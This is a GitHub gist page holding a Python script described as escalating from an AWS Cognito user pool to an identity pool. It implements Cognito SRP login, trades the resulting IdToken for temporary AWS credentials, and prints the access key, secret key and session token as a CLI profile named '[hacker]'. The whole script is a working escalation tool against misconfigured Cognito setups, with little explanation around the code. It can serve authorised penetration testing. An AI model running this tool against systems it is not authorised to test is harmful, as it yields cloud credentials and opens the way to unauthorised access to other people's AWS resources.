Last active
December 1, 2022 15:00
-
-
Save ThomasLachaux/576b678f7f463dbbb2925b1ddb21541e to your computer and use it in GitHub Desktop.
File used to escalate from a user pool to an identity pool
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author : Thibault Lengagne - @ThibaultLengagne | |
# Largely inspired from https://github.com/capless/warrant/blob/master/warrant/aws_srp.py | |
import base64 | |
import binascii | |
import datetime | |
import hashlib | |
import hmac | |
import re | |
import argparse | |
import boto3 | |
import os | |
import six | |
# https://github.com/aws/amazon-cognito-identity-js/blob/master/src/AuthenticationHelper.js#L22 | |
n_hex = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1' + '29024E088A67CC74020BBEA63B139B22514A08798E3404DD' + \ | |
'EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245' + 'E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' + \ | |
'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D' + 'C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F' + \ | |
'83655D23DCA3AD961C62F356208552BB9ED529077096966D' + '670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' + \ | |
'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9' + 'DE2BCBF6955817183995497CEA956AE515D2261898FA0510' + \ | |
'15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64' + 'ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' + \ | |
'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B' + 'F12FFA06D98A0864D87602733EC86A64521F2B18177B200C' + \ | |
'BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31' + '43DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF' | |
# https://github.com/aws/amazon-cognito-identity-js/blob/master/src/AuthenticationHelper.js#L49 | |
g_hex = '2' | |
info_bits = bytearray('Caldera Derived Key', 'utf-8') | |
def hash_sha256(buf): | |
"""AuthenticationHelper.hash""" | |
a = hashlib.sha256(buf).hexdigest() | |
return (64 - len(a)) * '0' + a | |
def hex_hash(hex_string): | |
return hash_sha256(bytearray.fromhex(hex_string)) | |
def hex_to_long(hex_string): | |
return int(hex_string, 16) | |
def long_to_hex(long_num): | |
return '%x' % long_num | |
def get_random(nbytes): | |
random_hex = binascii.hexlify(os.urandom(nbytes)) | |
return hex_to_long(random_hex) | |
def pad_hex(long_int): | |
""" | |
Converts a Long integer (or hex string) to hex format padded with zeroes for hashing | |
:param {Long integer|String} long_int Number or string to pad. | |
:return {String} Padded hex string. | |
""" | |
if not isinstance(long_int, six.string_types): | |
hash_str = long_to_hex(long_int) | |
else: | |
hash_str = long_int | |
if len(hash_str) % 2 == 1: | |
hash_str = '0%s' % hash_str | |
elif hash_str[0] in '89ABCDEFabcdef': | |
hash_str = '00%s' % hash_str | |
return hash_str | |
def compute_hkdf(ikm, salt): | |
""" | |
Standard hkdf algorithm | |
:param {Buffer} ikm Input key material. | |
:param {Buffer} salt Salt value. | |
:return {Buffer} Strong key material. | |
@private | |
""" | |
prk = hmac.new(salt, ikm, hashlib.sha256).digest() | |
info_bits_update = info_bits + bytearray(chr(1), 'utf-8') | |
hmac_hash = hmac.new(prk, info_bits_update, hashlib.sha256).digest() | |
return hmac_hash[:16] | |
def calculate_u(big_a, big_b): | |
""" | |
Calculate the client's value U which is the hash of A and B | |
:param {Long integer} big_a Large A value. | |
:param {Long integer} big_b Server B value. | |
:return {Long integer} Computed U value. | |
""" | |
u_hex_hash = hex_hash(pad_hex(big_a) + pad_hex(big_b)) | |
return hex_to_long(u_hex_hash) | |
class AWSSRP(object): | |
NEW_PASSWORD_REQUIRED_CHALLENGE = 'NEW_PASSWORD_REQUIRED' | |
PASSWORD_VERIFIER_CHALLENGE = 'PASSWORD_VERIFIER' | |
def __init__(self, username, password, pool_id, client_id, pool_region=None, | |
client=None, client_secret=None): | |
if pool_region is not None and client is not None: | |
raise ValueError("pool_region and client should not both be specified " | |
"(region should be passed to the boto3 client instead)") | |
self.username = username | |
self.password = password | |
self.pool_id = pool_id | |
self.client_id = client_id | |
self.client_secret = client_secret | |
self.client = client if client else boto3.client('cognito-idp', region_name=pool_region) | |
self.big_n = hex_to_long(n_hex) | |
self.g = hex_to_long(g_hex) | |
self.k = hex_to_long(hex_hash('00' + n_hex + '0' + g_hex)) | |
self.small_a_value = self.generate_random_small_a() | |
self.large_a_value = self.calculate_a() | |
def generate_random_small_a(self): | |
""" | |
helper function to generate a random big integer | |
:return {Long integer} a random value. | |
""" | |
random_long_int = get_random(128) | |
return random_long_int % self.big_n | |
def calculate_a(self): | |
""" | |
Calculate the client's public value A = g^a%N | |
with the generated random number a | |
:param {Long integer} a Randomly generated small A. | |
:return {Long integer} Computed large A. | |
""" | |
big_a = pow(self.g, self.small_a_value, self.big_n) | |
# safety check | |
if (big_a % self.big_n) == 0: | |
raise ValueError('Safety check for A failed') | |
return big_a | |
def get_password_authentication_key(self, username, password, server_b_value, salt): | |
""" | |
Calculates the final hkdf based on computed S value, and computed U value and the key | |
:param {String} username Username. | |
:param {String} password Password. | |
:param {Long integer} server_b_value Server B value. | |
:param {Long integer} salt Generated salt. | |
:return {Buffer} Computed HKDF value. | |
""" | |
u_value = calculate_u(self.large_a_value, server_b_value) | |
if u_value == 0: | |
raise ValueError('U cannot be zero.') | |
username_password = '%s%s:%s' % (self.pool_id.split('_')[1], username, password) | |
username_password_hash = hash_sha256(username_password.encode('utf-8')) | |
x_value = hex_to_long(hex_hash(pad_hex(salt) + username_password_hash)) | |
g_mod_pow_xn = pow(self.g, x_value, self.big_n) | |
int_value2 = server_b_value - self.k * g_mod_pow_xn | |
s_value = pow(int_value2, self.small_a_value + u_value * x_value, self.big_n) | |
hkdf = compute_hkdf(bytearray.fromhex(pad_hex(s_value)), | |
bytearray.fromhex(pad_hex(long_to_hex(u_value)))) | |
return hkdf | |
def get_auth_params(self): | |
auth_params = {'USERNAME': self.username, | |
'SRP_A': long_to_hex(self.large_a_value)} | |
if self.client_secret is not None: | |
auth_params.update({ | |
"SECRET_HASH": | |
self.get_secret_hash(self.username, self.client_id, self.client_secret)}) | |
return auth_params | |
@staticmethod | |
def get_secret_hash(username, client_id, client_secret): | |
message = bytearray(username + client_id, 'utf-8') | |
hmac_obj = hmac.new(bytearray(client_secret, 'utf-8'), message, hashlib.sha256) | |
return base64.standard_b64encode(hmac_obj.digest()).decode('utf-8') | |
def process_challenge(self, challenge_parameters): | |
user_id_for_srp = challenge_parameters['USER_ID_FOR_SRP'] | |
salt_hex = challenge_parameters['SALT'] | |
srp_b_hex = challenge_parameters['SRP_B'] | |
secret_block_b64 = challenge_parameters['SECRET_BLOCK'] | |
# re strips leading zero from a day number (required by AWS Cognito) | |
timestamp = re.sub(r" 0(\d) ", r" \1 ", | |
datetime.datetime.utcnow().strftime("%a %b %d %H:%M:%S UTC %Y")) | |
hkdf = self.get_password_authentication_key(user_id_for_srp, | |
self.password, hex_to_long(srp_b_hex), salt_hex) | |
secret_block_bytes = base64.standard_b64decode(secret_block_b64) | |
msg = bytearray(self.pool_id.split('_')[1], 'utf-8') + bytearray(user_id_for_srp, 'utf-8') + \ | |
bytearray(secret_block_bytes) + bytearray(timestamp, 'utf-8') | |
hmac_obj = hmac.new(hkdf, msg, digestmod=hashlib.sha256) | |
signature_string = base64.standard_b64encode(hmac_obj.digest()) | |
response = {'TIMESTAMP': timestamp, | |
'USERNAME': user_id_for_srp, | |
'PASSWORD_CLAIM_SECRET_BLOCK': secret_block_b64, | |
'PASSWORD_CLAIM_SIGNATURE': signature_string.decode('utf-8')} | |
if self.client_secret is not None: | |
response.update({ | |
"SECRET_HASH": | |
self.get_secret_hash(self.username, self.client_id, self.client_secret)}) | |
return response | |
def authenticate_user(self, client=None): | |
boto_client = self.client or client | |
auth_params = self.get_auth_params() | |
response = boto_client.initiate_auth( | |
AuthFlow='USER_SRP_AUTH', | |
AuthParameters=auth_params, | |
ClientId=self.client_id | |
) | |
if response['ChallengeName'] == self.PASSWORD_VERIFIER_CHALLENGE: | |
challenge_response = self.process_challenge(response['ChallengeParameters']) | |
tokens = boto_client.respond_to_auth_challenge( | |
ClientId=self.client_id, | |
ChallengeName=self.PASSWORD_VERIFIER_CHALLENGE, | |
ChallengeResponses=challenge_response) | |
if tokens.get('ChallengeName') == self.NEW_PASSWORD_REQUIRED_CHALLENGE: | |
print('Change password before authenticating') | |
exit(1) | |
return tokens | |
else: | |
raise NotImplementedError('The %s challenge is not supported' % response['ChallengeName']) | |
def set_new_password_challenge(self, new_password, client=None): | |
boto_client = self.client or client | |
auth_params = self.get_auth_params() | |
response = boto_client.initiate_auth( | |
AuthFlow='USER_SRP_AUTH', | |
AuthParameters=auth_params, | |
ClientId=self.client_id | |
) | |
if response['ChallengeName'] == self.PASSWORD_VERIFIER_CHALLENGE: | |
challenge_response = self.process_challenge(response['ChallengeParameters']) | |
tokens = boto_client.respond_to_auth_challenge( | |
ClientId=self.client_id, | |
ChallengeName=self.PASSWORD_VERIFIER_CHALLENGE, | |
ChallengeResponses=challenge_response) | |
if tokens['ChallengeName'] == self.NEW_PASSWORD_REQUIRED_CHALLENGE: | |
challenge_response = { | |
'USERNAME': auth_params['USERNAME'], | |
'NEW_PASSWORD': new_password | |
} | |
new_password_response = boto_client.respond_to_auth_challenge( | |
ClientId=self.client_id, | |
ChallengeName=self.NEW_PASSWORD_REQUIRED_CHALLENGE, | |
Session=tokens['Session'], | |
ChallengeResponses=challenge_response) | |
return new_password_response | |
return tokens | |
else: | |
raise NotImplementedError('The %s challenge is not supported' % response['ChallengeName']) | |
parser = argparse.ArgumentParser("") | |
parser.add_argument("--region", help="region", type=str) | |
parser.add_argument("--pool_id", help="pool_id", type=str) | |
parser.add_argument("--client_id", help="client_id", type=str) | |
parser.add_argument("--identity_pool_id", help="identity_pool_id", type=str) | |
parser.add_argument("--username", help="username", type=str) | |
parser.add_argument("--password", help="password", type=str) | |
args = parser.parse_args() | |
region = args.region | |
pool_id = args.pool_id | |
client_id = args.client_id | |
identity_pool_id = args.identity_pool_id | |
username = args.username | |
password = args.password | |
# Create SRP object | |
srp = AWSSRP( | |
username=username, | |
password=password, | |
pool_id=pool_id, | |
client_id=client_id, | |
pool_region=region, | |
) | |
# Get authenticated IdToken | |
resp = srp.authenticate_user() | |
token = resp['AuthenticationResult']['IdToken'] | |
logins = { | |
f'cognito-idp.{region}.amazonaws.com/{pool_id}' : token | |
} | |
# Get Identity id | |
identity_client = boto3.client('cognito-identity', region_name=region) | |
resp = identity_client.get_id( | |
IdentityPoolId=identity_pool_id, | |
Logins=logins | |
) | |
identity_id = resp['IdentityId'] | |
# Get AWS credentials from Pool | |
resp = identity_client.get_credentials_for_identity( | |
IdentityId=identity_id, | |
Logins=logins | |
) | |
credentials = resp['Credentials'] | |
access_key = credentials['AccessKeyId'] | |
secret_key = credentials['SecretKey'] | |
secret_token = credentials['SessionToken'] | |
print('[hacker]') | |
print('output = json') | |
print('aws_access_key_id = %s' % access_key) | |
print('aws_secret_access_key = %s' % secret_key) | |
print('aws_session_token = %s' % secret_token) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment